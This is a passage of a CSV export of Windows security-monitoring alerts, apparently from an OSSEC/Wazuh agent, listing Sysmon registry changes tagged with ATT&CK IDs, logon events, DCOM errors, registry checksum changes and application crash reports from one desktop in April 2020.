service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:15:44.221998300Z"",""eventRecordID"":""812"",""processID"":""2200"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:15:44.202\r\nProcessGuid: {df9fc3d3-5f46-5ea5-0000-001064a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\AarSvc_3ddcb\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k AarSvcGroup -p\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:15:44.202"",""processGuid"":""{df9fc3d3-5f46-5ea5-0000-001064a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\AarSvc_3ddcb\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k AarSvcGroup -p""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:15:44.202 +ProcessGuid: {df9fc3d3-5f46-5ea5-0000-001064a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\AarSvc_3ddcb\ImagePath +Details: C:\Windows\system32\svchost.exe -k AarSvcGroup -p""" +"Apr 26, 2020 @ 10:15:47.984",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:15:44.221713900Z"",""eventRecordID"":""811"",""processID"":""2200"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:15:44.202\r\nProcessGuid: {df9fc3d3-5f46-5ea5-0000-001064a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\AarSvc_3ddcb\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:15:44.202"",""processGuid"":""{df9fc3d3-5f46-5ea5-0000-001064a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\AarSvc_3ddcb\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:15:44.202 +ProcessGuid: {df9fc3d3-5f46-5ea5-0000-001064a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\AarSvc_3ddcb\Start +Details: DWORD (0x00000003)""" +"Apr 26, 2020 @ 10:15:47.650",5,"SessionEnv was unavailable to handle a notification event",,"""The winlogon notification subscriber was unavailable to handle a notification event.""" +"Apr 26, 2020 @ 10:15:46.056",3,"Windows Workstation Logon Success",,"""An account was successfully logged on. 
+ +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 2 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: No + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-21-438079597-2123118846-2669748851-1001 + Account Name: John Williams + Account Domain: DESKTOP-HUE026H + Logon ID: 0x37383 + Linked Logon ID: 0x37354 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x154 + Process Name: C:\Windows\System32\svchost.exe + +Network Information: + Workstation Name: DESKTOP-HUE026H + Source Network Address: 127.0.0.1 + Source Port: 0 + +Detailed Authentication Information: + Logon Process: User32 + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. 
+ - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 26, 2020 @ 10:15:45.955",3,"Windows Workstation Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 2 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-21-438079597-2123118846-2669748851-1001 + Account Name: John Williams + Account Domain: DESKTOP-HUE026H + Logon ID: 0x37354 + Linked Logon ID: 0x37383 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x154 + Process Name: C:\Windows\System32\svchost.exe + +Network Information: + Workstation Name: DESKTOP-HUE026H + Source Network Address: 127.0.0.1 + Source Port: 0 + +Detailed Authentication Information: + Logon Process: User32 + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. 
Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 26, 2020 @ 10:15:44.699",7,"SessionEnv was unavailable to handle a critical notification event",,"""The winlogon notification subscriber was unavailable to handle a critical notification event.""" +"Apr 26, 2020 @ 10:15:42.966",3,"Windows Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x24c + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. 
+ +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. 
This will be 0 if no session key was requested.""" +"Apr 26, 2020 @ 10:15:40.623",3,"Ossec agent started.","ossec: Agent started: 'windows-10->any'.", +"Apr 26, 2020 @ 10:15:03.645",12,"ATT&CK T1160: Potential Run Key Persistence Setup","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-07T12:21:11.326435600Z"",""eventRecordID"":""751"",""processID"":""2092"",""threadID"":""1004"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-04-07 12:21:11.319\r\nProcessGuid: {df9fc3d3-6de1-5e8c-0000-00104fa30000}\r\nProcessId: 488\r\nImage: C:\\Windows\\system32\\csrss.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\Application Restart #3\r\nDetails: C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE /restore\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-04-07 12:21:11.319"",""processGuid"":""{df9fc3d3-6de1-5e8c-0000-00104fa30000}"",""processId"":""488"",""image"":""C:\\\\Windows\\\\system32\\\\csrss.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\Application Restart #3"",""details"":""C:\\\\Program Files\\\\Microsoft Office\\\\root\\\\Office16\\\\WINWORD.EXE /restore""}}}","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-04-07 12:21:11.319 +ProcessGuid: {df9fc3d3-6de1-5e8c-0000-00104fa30000} +ProcessId: 488 +Image: C:\Windows\system32\csrss.exe +TargetObject: 
HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\RunOnce\Application Restart #3 +Details: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE /restore""" +"Apr 26, 2020 @ 10:15:03.598",12,"ATT&CK T1160: Potential Run Key Persistence Setup","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-07T12:21:11.326252100Z"",""eventRecordID"":""750"",""processID"":""2092"",""threadID"":""1004"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-04-07 12:21:11.319\r\nProcessGuid: {df9fc3d3-6de1-5e8c-0000-00104fa30000}\r\nProcessId: 488\r\nImage: C:\\Windows\\system32\\csrss.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\Application Restart #2\r\nDetails: C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE /restore\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-04-07 12:21:11.319"",""processGuid"":""{df9fc3d3-6de1-5e8c-0000-00104fa30000}"",""processId"":""488"",""image"":""C:\\\\Windows\\\\system32\\\\csrss.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\Application Restart #2"",""details"":""C:\\\\Program Files\\\\Microsoft Office\\\\root\\\\Office16\\\\WINWORD.EXE /restore""}}}","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-04-07 12:21:11.319 +ProcessGuid: {df9fc3d3-6de1-5e8c-0000-00104fa30000} +ProcessId: 488 +Image: C:\Windows\system32\csrss.exe +TargetObject: 
HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\RunOnce\Application Restart #2 +Details: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE /restore""" +"Apr 26, 2020 @ 10:15:03.552",12,"ATT&CK T1160: Potential Run Key Persistence Setup","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-07T12:21:11.326134800Z"",""eventRecordID"":""749"",""processID"":""2092"",""threadID"":""1004"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-04-07 12:21:11.319\r\nProcessGuid: {df9fc3d3-6de1-5e8c-0000-00104fa30000}\r\nProcessId: 488\r\nImage: C:\\Windows\\system32\\csrss.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\Application Restart #1\r\nDetails: C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE /restore\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-04-07 12:21:11.319"",""processGuid"":""{df9fc3d3-6de1-5e8c-0000-00104fa30000}"",""processId"":""488"",""image"":""C:\\\\Windows\\\\system32\\\\csrss.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\Application Restart #1"",""details"":""C:\\\\Program Files\\\\Microsoft Office\\\\root\\\\Office16\\\\WINWORD.EXE /restore""}}}","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-04-07 12:21:11.319 +ProcessGuid: {df9fc3d3-6de1-5e8c-0000-00104fa30000} +ProcessId: 488 +Image: C:\Windows\system32\csrss.exe +TargetObject: 
HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\RunOnce\Application Restart #1 +Details: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE /restore""" +"Apr 26, 2020 @ 10:15:03.535",12,"ATT&CK T1160: Potential Run Key Persistence Setup","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-07T12:21:11.325997100Z"",""eventRecordID"":""748"",""processID"":""2092"",""threadID"":""1004"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-04-07 12:21:11.319\r\nProcessGuid: {df9fc3d3-6de1-5e8c-0000-00104fa30000}\r\nProcessId: 488\r\nImage: C:\\Windows\\system32\\csrss.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\Application Restart #0\r\nDetails: C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe --flag-switches-begin --flag-switches-end --enable-audio-service-sandbox --restore-last-session\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-04-07 12:21:11.319"",""processGuid"":""{df9fc3d3-6de1-5e8c-0000-00104fa30000}"",""processId"":""488"",""image"":""C:\\\\Windows\\\\system32\\\\csrss.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\Application Restart #0"",""details"":""C:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe --flag-switches-begin --flag-switches-end --enable-audio-service-sandbox --restore-last-session""}}}","""Registry value set: +RuleName: T1060,RunKey 
+EventType: SetValue +UtcTime: 2020-04-07 12:21:11.319 +ProcessGuid: {df9fc3d3-6de1-5e8c-0000-00104fa30000} +ProcessId: 488 +Image: C:\Windows\system32\csrss.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\RunOnce\Application Restart #0 +Details: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe --flag-switches-begin --flag-switches-end --enable-audio-service-sandbox --restore-last-session""" +"Apr 26, 2020 @ 10:15:03.519",3,"Windows User Logoff",,"""User initiated logoff: + +Subject: + Security ID: S-1-5-21-438079597-2123118846-2669748851-1001 + Account Name: John Williams + Account Domain: DESKTOP-HUE026H + Logon ID: 0x350B0 + +This event is generated when a logoff is initiated. No further user-initiated activity can occur. This event can be interpreted as a logoff event.""" +"Apr 26, 2020 @ 10:15:02.598",5,"SessionEnv was unavailable to handle a notification event",,"""The winlogon notification subscriber was unavailable to handle a notification event.""" +"Apr 26, 2020 @ 10:15:02.584",5,"WSearch was unavailable to handle a notification event",,"""The winlogon notification subscriber was unavailable to handle a notification event.""" +"Apr 26, 2020 @ 10:15:01.520",5,"Windows System error event",,"""The server {3EB3C877-1F16-487C-9050-104DBCD66683} did not register with DCOM within the required timeout.""" +"Apr 26, 2020 @ 10:15:01.504",5,"Windows System error event",,"""The server {3EB3C877-1F16-487C-9050-104DBCD66683} did not register with DCOM within the required timeout.""" +"Apr 26, 2020 @ 10:15:01.490",5,"Windows System error event",,"""The server {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} did not register with DCOM within the required timeout.""" +"Apr 26, 2020 @ 10:15:01.474",5,"Windows System error event",,"""The server {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} did not register with DCOM within the required timeout.""" +"Apr 26, 2020 @ 10:15:01.457",10,"Multiple System error 
events",,"""The server {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} did not register with DCOM within the required timeout.""" +"Apr 26, 2020 @ 10:15:01.039",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: '77452a225ee13df710790a5b4f328a2c' +New md5sum is : 'd64ecd3813037bada0bfee569056567f' +Old sha1sum was: '35ff32bd38b77e38d2689d9661696e1637758085' +New sha1sum is : '5e4e3349a0a93949f867c623c0c0cda1be5c09c0' +", +"Apr 26, 2020 @ 10:15:00.504",5,"Windows System error event",,"""The server {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} did not register with DCOM within the required timeout.""" +"Apr 26, 2020 @ 10:15:00.490",5,"Windows System error event",,"""The server {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} did not register with DCOM within the required timeout.""" +"Apr 26, 2020 @ 10:15:00.473",5,"Windows System error event",,"""The server Microsoft.AAD.BrokerPlugin_1000.18362.449.0_neutral_neutral_cw5n1h2txyewy!Windows.Security.Authentication.Web.Core.BackgroundGetTokenTask.ClassId.WebAccountProvider did not register with DCOM within the required timeout.""" +"Apr 26, 2020 @ 10:15:00.457",5,"Windows System error event",,"""The server Microsoft.AAD.BrokerPlugin_1000.18362.449.0_neutral_neutral_cw5n1h2txyewy!Windows.Security.Authentication.Web.Core.BackgroundGetTokenTask.ClassId.WebAccountProvider did not register with DCOM within the required timeout.""" +"Apr 26, 2020 @ 10:15:00.441",5,"Windows System error event",,"""The server Microsoft.AAD.BrokerPlugin_1000.18362.449.0_neutral_neutral_cw5n1h2txyewy!Windows.Security.Authentication.Web.Core.BackgroundGetTokenTask.ClassId.WebAccountProvider did not register with DCOM within the required timeout.""" +"Apr 26, 2020 @ 10:14:59.371",5,"Windows System error event",,"""The server Microsoft.OneConnect_5.2002.431.0_x64__8wekyb3d8bbwe!App.AppXe8pdgw5syxe8pgccbk3mcn5hanwamr0e.mca did not 
register with DCOM within the required timeout.""" +"Apr 26, 2020 @ 10:14:59.333",5,"Windows System error event",,"""The server Microsoft.MicrosoftOfficeHub_18.2002.1101.0_x64__8wekyb3d8bbwe!Microsoft.MicrosoftOfficeHub.AppXt4mh7c9swwc5cmd5jgmtmwcfmvkddpn1.mca did not register with DCOM within the required timeout.""" +"Apr 26, 2020 @ 10:14:49.119",3,"Windows Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x24c + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. 
+ +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 26, 2020 @ 10:12:24.478",7,"Integrity checksum changed.","File '[x64] HKEY_USERS\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run' checksum changed. +Old md5sum was: 'eec716ae7b147d80b2bff4d347692f12' +New md5sum is : '754f1ee7e3cc78fe16476bedca194ad8' +Old sha1sum was: '9e2076f20312cd8b816e3b8fe2747d55e17ac1a2' +New sha1sum is : '71353faa3213206f750e881a2b1d4519bdb7044b' +", +"Apr 26, 2020 @ 10:12:24.470",7,"Integrity checksum changed.","File 'HKEY_USERS\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run' checksum changed. +Old md5sum was: 'eec716ae7b147d80b2bff4d347692f12' +New md5sum is : '754f1ee7e3cc78fe16476bedca194ad8' +Old sha1sum was: '9e2076f20312cd8b816e3b8fe2747d55e17ac1a2' +New sha1sum is : '71353faa3213206f750e881a2b1d4519bdb7044b' +", +"Apr 26, 2020 @ 10:12:10.896",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits' checksum changed. 
+Old md5sum was: 'bbd3c2d027909fd8ca60e5fb29be1c11' +New md5sum is : '06ee04d9da091e86d711d66806729f5c' +Old sha1sum was: '840961701b92e0a0bb75a3c992b2e764bb835d51' +New sha1sum is : '7707469f1df348faab167e60c47e12aed52a2835' +", +"Apr 26, 2020 @ 10:12:10.888",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime' checksum changed. +Old md5sum was: '4256845286e0a414097e9c63c150cb5d' +New md5sum is : '69f9f86f89c4f1044f697b8ca9951f90' +Old sha1sum was: '684a425e096a2850d4c8dc9679a024c65fd89a91' +New sha1sum is : 'ff1c71f7d5380708f2299827b7f088e4f472cde2' +", +"Apr 26, 2020 @ 10:11:37.335",4,"Summary event of the report's signatures",,"""Fault bucket 1748590087670006804, type 4 +Event Name: APPCRASH +Response: Not available +Cab Id: 0 + +Problem signature: +P1: ApplicationFrameHost.exe +P2: 10.0.18362.1 +P3: bd2da9a6 +P4: ntdll.dll +P5: 10.0.18362.719 +P6: 64d10ee0 +P7: c0000005 +P8: 000000000003b890 +P9: +P10: + +Attached files: +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER2D2D.tmp.dmp +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER2FAE.tmp.WERInternalMetadata.xml +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER2FEE.tmp.xml +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER3016.tmp.csv +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER3065.tmp.txt + +These files may be available here: +\\?\C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_ApplicationFrame_95f59f48c671a84fbb96e96ffdc18a7bcf3d12a_3264d41a_4f415d0b-4356-4882-a2c6-8cf4516c9906 + +Analysis symbol: +Rechecking for solution: 0 +Report Id: f41bab22-e73b-46f3-927e-95d051758fb5 +Report Status: 268435456 +Hashed bucket: a1c4031c1238e6dca8443d6b99570414 +Cab Guid: 0""" +"Apr 26, 2020 @ 10:11:37.299",4,"Summary event of the report's signatures",,"""Fault bucket 1162358189688482716, type 5 +Event Name: FaultTolerantHeap +Response: Not available +Cab Id: 0 + +Problem signature: +P1: ApplicationFrameHost.exe +P2: 10.0.18362.1 
+P3: BD2DA9A6 +P4: ffffbaad +P5: +P6: +P7: +P8: +P9: +P10: + +Attached files: +\\?\C:\Windows\SERVIC~1\LOCALS~1\AppData\Local\Temp\FTH2C74.tmp\fthempty.txt +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER2C75.tmp.WERInternalMetadata.xml +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER2C95.tmp.xml +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER2CF7.tmp.csv +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER2E11.tmp.txt + +These files may be available here: + + +Analysis symbol: +Rechecking for solution: 0 +Report Id: f857b43f-df19-42db-9569-4ff9fa8c1634 +Report Status: 268435456 +Hashed bucket: 3f2d25722684bffdd021869d7625eb9c +Cab Guid: 0""" +"Apr 26, 2020 @ 10:11:33.823",9,"Windows Application error event",,"""Faulting application name: ApplicationFrameHost.exe, version: 10.0.18362.1, time stamp: 0xbd2da9a6 +Faulting module name: ntdll.dll, version: 10.0.18362.719, time stamp: 0x64d10ee0 +Exception code: 0xc0000005 +Fault offset: 0x000000000003b890 +Faulting process id: 0x1280 +Faulting application start time: 0x01d60cd5d1e97351 +Faulting application path: C:\Windows\system32\ApplicationFrameHost.exe +Faulting module path: C:\Windows\SYSTEM32\ntdll.dll +Report Id: f41bab22-e73b-46f3-927e-95d051758fb5 +Faulting package full name: +Faulting package-relative application ID: """ +"Apr 26, 2020 @ 10:11:28.147",4,"Summary event of the report's signatures",,"""Fault bucket 1791194967134900880, type 5 +Event Name: MoAppCrash +Response: Not available +Cab Id: 0 + +Problem signature: +P1: Microsoft.Windows.StartMenuExperienceHost_10.0.18362.449_neutral_neutral_cw5n1h2txyewy +P2: praid:runtimebroker07f4358a809ac99a64a67c1 +P3: 10.0.18362.1 +P4: 4539d5a0 +P5: ntdll.dll +P6: 10.0.18362.719 +P7: 64d10ee0 +P8: c0000005 +P9: 000000000003b890 +P10: + +Attached files: +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WERE1C.tmp.dmp +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WERFF1.tmp.WERInternalMetadata.xml +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER107F.tmp.xml 
